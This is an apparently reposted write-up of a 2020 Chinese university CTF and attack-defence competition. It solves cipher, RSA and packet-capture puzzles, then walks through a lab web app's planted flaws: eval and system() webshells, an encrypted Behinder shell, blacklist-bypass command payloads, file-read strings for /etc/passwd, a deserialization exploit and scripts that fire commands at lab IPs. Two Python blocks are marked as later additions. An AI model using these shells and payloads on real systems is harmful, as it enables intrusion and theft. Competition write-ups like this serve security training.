2020 Third Jiangxi Provincial University Cyber Security Skills Competition, Onsite Finals: CTF & AWD Writeup


CTF

Misc

Boring_exe

!_

..... ..... ..... ..... !?!!. ?.... ..... ..... ..... .?.?! .?... .!...
..... ..... !.?.. ..... !?!!. ?!!!! !!?.? !.?!! !!!.. ..... ..... .!.?.
..... ...!? !!.?. ..... ..?.? !.?.. ..... .!.?. ..... ..... ..!?! !.?!!
!!!!! !!!!! ?.?!. ?!!!! !!!!! !!!!! !!!.? ..... ..... .!?!! .?... .....
..?.? !.?.. ..... ..... ..!.! !!!!! !!!.! !!!!. ?.... ...!? !!.?. .....
?.?!. ?..!. !!!!! !!!!. !!!!! !!!!. ?.... ..... !?!!. ?.... ....? .?!.?
....! .?.

Ook! cipher
Ook! online decoder: https://tool.bugku.com/brainfuck/

flag{Ookisok}
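An offline decoder for the short-form Ook! program above, added here as a constructed example (not code from the original writeup): it maps each symbol pair to its Brainfuck instruction and runs the result. The function names, the step limit and the bracket check are assumptions added so a malformed program cannot hang the decoder.

```python
# Short Ook! keeps only the punctuation of "Ook." "Ook!" "Ook?"; each pair is one op.
OOK_TO_BF = {
    ".?": ">", "?.": "<", "..": "+", "!!": "-",
    "!.": ".", ".!": ",", "!?": "[", "?!": "]",
}

def ook_to_bf(src: str) -> str:
    """Drop everything but . ! ? (so long-form 'Ook. Ook?' works too) and pair up."""
    syms = [ch for ch in src if ch in ".!?"]
    if len(syms) % 2:
        raise ValueError("odd number of Ook! symbols: truncated program?")
    return "".join(OOK_TO_BF[a + b] for a, b in zip(syms[::2], syms[1::2]))

def run_bf(code: str, stdin: bytes = b"", max_steps: int = 10_000_000) -> str:
    """Minimal Brainfuck interpreter: 8-bit cells, 30000-cell tape, step limit."""
    jump, stack = {}, []
    for i, op in enumerate(code):          # pre-compute matching brackets
        if op == "[":
            stack.append(i)
        elif op == "]":
            if not stack:
                raise ValueError("unbalanced ']'")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, pc, inp, out = [0] * 30000, 0, 0, 0, bytearray()
    for _ in range(max_steps):
        if pc >= len(code):
            break
        op = code[pc]
        if op == ">":
            ptr += 1
        elif op == "<":
            ptr -= 1
        elif op == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif op == ".":
            out.append(tape[ptr])
        elif op == ",":
            tape[ptr] = stdin[inp] if inp < len(stdin) else 0
            inp += 1
        elif (op == "[" and tape[ptr] == 0) or (op == "]" and tape[ptr] != 0):
            pc = jump[pc]                  # skip the loop / jump back to its start
        pc += 1
    else:
        raise RuntimeError("step limit reached: program does not terminate?")
    return out.decode("latin-1")

def decode_ook(src: str) -> str:
    return run_bf(ook_to_bf(src))
```

Paste the challenge text into decode_ook() to reproduce the flag offline instead of through the web decoder.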

ezAffine

Daylight

Thanks to team WAXZ from Jiangxi Normal University for providing the writeup for this challenge

n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519
c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690
e1=35
e2=42
#python2
import gmpy2
from Crypto.Util import number

# Extended Euclid: returns (g, x, y) with m*x + n*y == g == gcd(m, n)
def exgcd(m, n, x, y):
    if n == 0:
        x = 1
        y = 0
        return (m, x, y)
    a1 = b = 1
    a = b1 = 0
    c = m
    d = n
    q = c // d
    r = c % d
    while r:
        c = d
        d = r
        t = a1
        a1 = a
        a = t - q * a
        t = b1
        b1 = b
        b = t - q * b
        q = c // d
        r = c % d
    x = a
    y = b
    return d, x, y

c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690

# gcd(e1, e2) == 7, so the common-modulus attack only yields m^7 mod n
e1=35
e2=42
e1=e1//7
e2=e2//7
n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519

ans=exgcd(e1,e2,0,0)
s1=ans[1]
s2=ans[2]
# c1^s1 * c2^s2 == m^(5*s1 + 6*s2) == m^7 (mod n); gmpy2.powmod handles the negative exponent
m=(gmpy2.powmod(c1,s1,n)*gmpy2.powmod(c2,s2,n))%n
print gmpy2.iroot(m,7)[1]
# m^7 may be larger than n, so add n until an exact 7th root exists
while gmpy2.iroot(m,7)[1]==False:
    m=m+n
print m
print number.long_to_bytes(gmpy2.iroot(m,7)[0])

flag{1_0nly_see_d4ylight_d4ylight}
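The same common-modulus attack in Python 3 without gmpy2, added here as a constructed example (not the writeup's script): the toy modulus 61*53, the messages and the names ext_gcd, iroot, common_modulus and demo are assumptions; the exponents 35 and 42 match the challenge, so the gcd is 7 and both the integer 7th root and the add-n lift are exercised.

```python
from math import gcd

def ext_gcd(a: int, b: int) -> tuple:
    """Return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x, y = ext_gcd(b, a % b)
    return g, y, x - (a // b) * y

def iroot(x: int, k: int) -> tuple:
    """Integer k-th root by binary search; the flag says whether it is exact."""
    lo, hi = 0, 1 << ((x.bit_length() + k - 1) // k + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** k <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo, lo ** k == x

def common_modulus(n: int, e1: int, e2: int, c1: int, c2: int, max_lift: int = 10000) -> int:
    """Recover m from c1 = m^e1 and c2 = m^e2 (mod n), same n for both.

    With g = gcd(e1, e2), Bezout coefficients s1, s2 for e1/g and e2/g give
    c1^s1 * c2^s2 = m^(e1*s1 + e2*s2) = m^g (mod n).  Because g is not 1
    (7 in the challenge) the last step is an integer g-th root; m^g may exceed
    n, so n is added until an exact root appears, which only works while the
    message is short enough that m^g is not far above n."""
    g = gcd(e1, e2)
    _, s1, s2 = ext_gcd(e1 // g, e2 // g)
    # pow() with a negative exponent computes the modular inverse (Python 3.8+)
    mg = pow(c1, s1, n) * pow(c2, s2, n) % n
    for _ in range(max_lift):
        root, exact = iroot(mg, g)
        if exact:
            return root
        mg += n
    raise ValueError("no exact g-th root within the lift bound")

# Constructed toy instance: n = 61 * 53, same exponents as the challenge.
TOY_N, TOY_E1, TOY_E2 = 61 * 53, 35, 42

def demo(m: int) -> int:
    """Encrypt m twice under the toy modulus and recover it again."""
    return common_modulus(TOY_N, TOY_E1, TOY_E2, pow(m, TOY_E1, TOY_N), pow(m, TOY_E2, TOY_N))
```

With m = 5 the value m^7 = 78125 exceeds the toy n, so demo(5) goes through the lift loop 24 times before the exact root appears.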

Blue

binwalk analysis

foremost extraction

The zip uses pseudo-encryption (the encryption bit is set without real encryption)

This yields blindsql.pcapng

The file name already says this is a blind SQL injection capture, so filtering for HTTP packets is enough.
The parameters are passed directly via GET, so the filter can be narrowed further:

http.request.method==GET

Analysing the blind injection, the ASCII code of the first character of the flag field is 102:

>>> chr(102)
'f'

Repeat for the remaining characters.

flag{Gre4t_j0B_ON_This_Blue_sh4rk}

Web

Aurora website

Upload an image and modify the Content-Type; according to the hint, this is a race condition.
Keep sending the request with Burp Intruder.

web2 (forgot its name)

Thanks to team Stalker from Jiangxi University of Science and Technology for the approach

Crypto

EasyRSA

flag{We1c0meCtf3r_elab}

Interceptedtelegram

Morse code

.- -.-. - .. ----- -. --.- ..- .. -.-. -.-

Morse code online decoder: http://www.zhongguosou.com/zonghe/moersicodeconverter.aspx

flag{ACTI0NQUICK}

AWD

AWD1

awd1
├── about.php
├── admin
│   ├── footer.php
│   ├── header.php
│   ├── index.php
│   ├── logout.php
│   ├── upload
│   │   ├── 1596596144.png
│   │   ├── 1600179756.php
│   │   ├── 1600180813.exe
│   │   └── .library.php
│   └── upload.php
├── config.php
├── contact.php
├── css
│   ├── bootstrap.css
│   ├── chocolat.css
│   ├── flexslider.css
│   └── style.css
├── data
│   ├── flot-data.js
│   └── morris-data.js
├── footer.php
├── gulpfile.js
├── header.php
├── images
│   ├── 10.jpg
│   ├── 11.jpg
│   ├── 12.jpg
│   ├── 13.jpg
│   ├── 14.jpg
│   ├── 15.jpg
│   ├── 16.jpg
│   ├── 17.jpg
│   ├── 1.jpg
│   ├── 1.png
│   ├── 2.jpg
│   ├── 2.png
│   ├── 3.jpg
│   ├── 3.png
│   ├── 4.jpg
│   ├── 4.png
│   ├── 5.jpg
│   ├── 5.png
│   ├── 6.jpg
│   ├── 7.jpg
│   ├── 8.jpg
│   ├── 9.jpg
│   ├── banner1.jpg
│   ├── banner.jpg
│   ├── close.png
│   ├── co.png
│   ├── img-sp.png
│   ├── left.png
│   └── right.png
├── index.php
├── js
│   ├── bootstrap.js
│   ├── jquery-1.11.1.min.js
│   ├── jquery.chocolat.js
│   ├── jquery.flexslider.js
│   └── sb-admin-2.js
├── less
│   ├── mixins.less
│   ├── sb-admin-2.less
│   └── variables.less
├── login.php
├── search.php
├── ser.php
├── services.php
├── .shell.php
├── single.php
└── Wopop_files
    ├── askgreen.png
    ├── errorred.png
    ├── google_jquery.min.js
    ├── google_jquery-ui.min.js
    ├── JQuery.cookie.js
    ├── jquery.pagination.js
    ├── jquery.ui.all.css
    ├── loading1.gif
    ├── loadingpn.gif
    ├── login_bgx.gif
    ├── login.js
    ├── login_m_bg.png
    ├── logo.png
    ├── okgreen.png
    ├── pagination.css
    ├── site_bg.png
    ├── style.css
    ├── style_log.css
    ├── userpanel.css
    └── webtemples.js

8 directories, 85 files

Exploit point 1

Backdoor file: awd1/.shell.php

<?php
$key = $_POST["cmd"];
if(isset($key)){
    $key = str_replace("flag","",$key);
}
eval($key);
?>

It only replaces the literal string flag with nothing, so there are many ways around it:

cmd=system("cat /flflagag.txt");
cmd=system("cat /fl''ag.txt");
cmd=system("cat /fla'g'.txt");
cmd=system("cat /fl${9}ag.txt");
cmd=system("cat /fl${IFS}ag.txt");
cmd=system("cat /fl\ag.txt");
cmd=system("cat /`echo 'ZmxhZy50eHQ=' | base64 -d`");
........


import requests

def post_shell(ip_list):
    flag_path = '/.shell.php'  # path of the backdoor
    post_data = 'cmd=system("cat /flflagag.txt");'
    for i in ip_list:
        header_info = {
            'Host': i,
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        flag_url = 'http://' + i + flag_path
        res = requests.post(url=flag_url, data=post_data, headers=header_info)
        print("[+]{0}:   {1}\n".format(i, res.text))


if __name__ == '__main__':
    ip_list = [
        '172.20.102.101',
        '172.20.103.101',
        '172.20.104.101',
        '172.20.105.101',
        '172.20.106.101',
        '172.20.107.101',
        '172.20.108.101',
        '172.20.109.101',
        '172.20.110.101',
        '172.20.111.101',
        '172.20.112.101',
    ]
    post_shell(ip_list)

Exploit point 2

Arbitrary file read: awd1/about.php

<?php
    $file=$_GET['file'];
    $file = str_replace("flag","",$file);
    $file = str_replace("../","",$file);
    $file = str_replace("..","",$file);
    $file = str_replace("file://","",$file);
    @print_r(file_get_contents($file));
?>

Read the absolute path through the file:// wrapper; in an AWD environment the absolute path of the flag is known: /flag.txt. Each str_replace runs only once, so nesting a filtered word inside itself leaves it intact after the replacement:

?file=fifile://le:///flflagag.txt
?file=php://filter/read=convert.base64-encode/resource=/flflagag.txt
......

Exploit point 3

Code execution: awd1/config.php

// web root
$basedir = '';
$shell=@$_POST['shell'];
if(preg_match('/(system|exec|shell|file_|call|open|preg|eval|assert|pass|include|require|key)/i', $shell)) {
    exit();
}
@eval($shell);

Bypass the blacklist to reach code execution:

shell=(s.y.s.t.e.m)('cat /flag.txt');
shell="\x73\x79\x73\x74\x65\x6d"('cat /flag.txt');


Exploit point 4

Arbitrary file read: awd1/contact.php

<?php
    include 'header.php';
    $file_path = @$_GET['path'];
    if(file_exists($file_path)){
        $fp = fopen($file_path,"r");
        $str = fread($fp,filesize($file_path));
        echo $str = str_replace("\r\n","<br />",$str);
    }
?>
?path=/flag.txt
?path=/etc/passwd

Exploit point 5

Command execution with filter bypass: awd1/footer.php

<?php
    $shell=@$_POST['shell'];
    if(preg_match('/(cat|\ |more|flag)/i',$shell)&&str_replace(" ","",$shell)) {
        exit();
    }else{
        @system($shell);
    }
?>
shell=ca''t</fl''ag.txt
shell=`echo${IFS}Y2F0IC9mbGFnLnR4dAo=|base64${IFS}-d`
shell=a=ca;b=t;c=fl;d=ag;$a$b${IFS}/$c$d.txt

Exploit point 6

SQL injection: awd1/login.php

<?php
    include_once('config.php');
    if (!empty($_POST['username'])) {
        $user=$_POST['username'];
        $pass=$_POST['password'];
        $query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' ";
        $data = mysqli_query($dbc,$query);
        if (mysqli_num_rows($data) == 1) {
            $row = mysqli_fetch_array($data);
            $_SESSION['username'] = $row['user_name'];
            header('Location: ./admin/index.php');
        }else{
            echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';
        }
    }
?>


Exploit point 7

SQL injection: awd1/search.php

<?php
    include 'header.php';
    include_once('config.php');
    $id=$_GET['id'];
    $check = eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $id);
    if($check){
        echo "Invalid strings!!!Please try agine!";
    }else{
        $query = "SELECT * FROM news WHERE id=$id";
        $data = mysqli_query($dbc,$query);
        $com = mysqli_fetch_array($data);
    }
?>

eregi() can be truncated with %00, after which injection is possible.

ereg()/eregi() were deprecated in PHP 7; my container environment here is PHP 7.3, and testing returns a fatal error.

Too lazy to test further...

Exploit point 8

Deserialization code execution: awd1/ser.php

<?php
class Smi1e
{
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new safe();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}

class safe
{
    function action() {
        echo "Here is safe";
    }
}

class unsafe
{
    private $data;
    function action() {
        eval($this->data);
    }
}

unserialize(@$_GET['test']);

Construct the PoC directly:

<?php
class Smi1e
{
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new unsafe();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}
class unsafe
{
    private $data="system('cat /flag.txt');";
    function action() {
        eval($this->data);
    }
}

$res = new Smi1e();
echo urlencode(serialize($res));
?>
?test=O%3A5%3A%22Smi1e%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A6%3A%22unsafe%22%3A1%3A%7Bs%3A12%3A%22%00unsafe%00data%22%3Bs%3A24%3A%22system%28%27cat+%2Fflag.txt%27%29%3B%22%3B%7D%7D

PS: a gripe about the class name Smi1e the challenge author chose; I kept reading Smi1e as Smile.......

Exploit point 9

Command execution: awd1/admin/footer.php

<?php
    $shell=@$_POST['shell'];
    @system($shell);
    if($shell !=""){
        exit();
    }
?>
shell=cat /flag.txt

Exploit point 10

Flag handed out directly: awd1/admin/index.php

<!-- banner -->
	<div class="banner1">
	</div>
<!-- //banner -->
<!-- single -->
	<div class="single">
		<div class="container">
			<div class="single-page-artical">
				<div class="artical-content">
					<h3>flag:<?php print_r(file_get_contents('/flag'));?></h3>
					<img class="img-responsive" src="../images/banner.jpg" alt=" " />
					<p></p>
				</div>

But I recall that during the competition the flag's path and file name were /flag.txt, so this did not read anything during the competition.

Change it to /flag.txt and the flag can be read.

Exploit point 11

Arbitrary file upload: awd1/admin/upload.php

<html lang="zh-CN">
  <head>
    <meta charset="utf-8">
<?php
include_once('../config.php');
if (isset($_SESSION['username'])) {
    include_once('header.php');
    $html_username = htmlspecialchars($_SESSION['username']);
    if(isset($_SESSION['error_info']) && $_SESSION['error_info'] != '') {
        echo $_SESSION['error_info'];
        $_SESSION['error_info'] = '';
    }
}
else {
    header('Location: ../login.php');
}
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{
    if($name!=="")
    {
        $name1=substr($name,-4);
        if(is_uploaded_file($tmpName)){
            $time=time();
            $rootpath='./upload/'.$time.$name1;
            $file=fopen($tmpName, "r") or die('No such file!');
            $content=fread($file, filesize($tmpName));
            if(strstr($content,'fuck')){
                exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
            }
            if(!move_uploaded_file($tmpName,$rootpath)){
                echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";
                exit;
            }
        }
        echo "上传成功:/upload/".$time.$name1;
    }
}
catch(Exception $e)
{
    echo "ERROR";
}
//
require('footer.php');
?>
</html>

The redirect to login.php is not followed by exit, so the upload code still runs without a session, and the only check on the file name is its last four characters.

The challenge itself already ships a command-execution backdoor at awd1/admin/upload/1600179756.php

//1600179756.php
<?php system($_GET['cmd']);?>

Exploit point 12

Behinder (冰蝎) shell: awd1/admin/upload/.library.php

<?php
@error_reporting(0);
session_start();
if (isset($_GET['djicoieDJNCIVD']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        for($i=0;$i<strlen($post);$i++) {
            $post[$i] = $post[$i]^$key[$i+1&15];
        }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{
        public function __construct($p) {
            eval($p."");
        }
    }
    @new C($params);
}
?>

Behinder shell: https://www.t00ls.net/articles-56337.html

PS C:\Users\Administrator\Desktop> php -r "echo openssl_encrypt('|system(\'whoami\');','AES128','');"
sbD9xXGKpb2/BSn/O/gPNg0MrbwusxVXLEVTNRXyGcc=


AWD2

Exploit point 1

File read that hands out the flag: ecshop/a.php

<?php
if(isset($_GET['shop'])){
    echo file_get_contents(base64_decode('L2ZsYWcudHh0'));
}
?>

PS C:\Users\Administrator> php -r "var_dump(base64_decode('L2ZsYWcudHh0'));"
string(9) "/flag.txt"

import requests

def get_shell(ip_list):
    flag_path = '/a.php'
    pwd = 'shop'
    command = 'test'

    for i in ip_list:
        flag_url = 'http://' + i + flag_path + '/?' + pwd + '=' + command
        res = requests.get(url=flag_url)
        print("[+]{0}:   {1}\n".format(i, res.text))


if __name__ == '__main__':
    ip_list = [
        '172.20.102.102',
        '172.20.103.102',
        '172.20.104.102',
        '172.20.105.102',
        '172.20.106.102',
        '172.20.107.102',
        '172.20.108.102',
        '172.20.109.102',
        '172.20.110.102',
        '172.20.111.102',
        '172.20.112.102',
    ]
    get_shell(ip_list)

Exploit point 2

Command execution: ecshop/api.php

$hook = $_GET['s'];
if(isset($hook)){
    echo `$hook`;
}
?s=cat /flag.txt


Exploit point 3

File read that hands out the flag: ecshop/check_file.php

if(isset($_GET['shop'])){
    echo file_get_contents(base64_decode('L2ZsYWcudHh0'));
}


Exploit point 4

File read meant to hand out the flag: ecshop/config.php

f(isset($_GET['shop'])){
    echo file_get_contents(base64_decode('ZmxhZy50eHQ='));
}
?><?php
if(isset($_GET['shop'])){
    echo file_get_contents(base64_decode('ZmxhZy50eHQ='));
}
?>

But the flag.txt path is written wrong here (relative instead of absolute), so it cannot be read:

PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZy50eHQ='));"
string(8) "flag.txt"


Reposted from blog.csdn.net/mochu7777777/article/details/108614900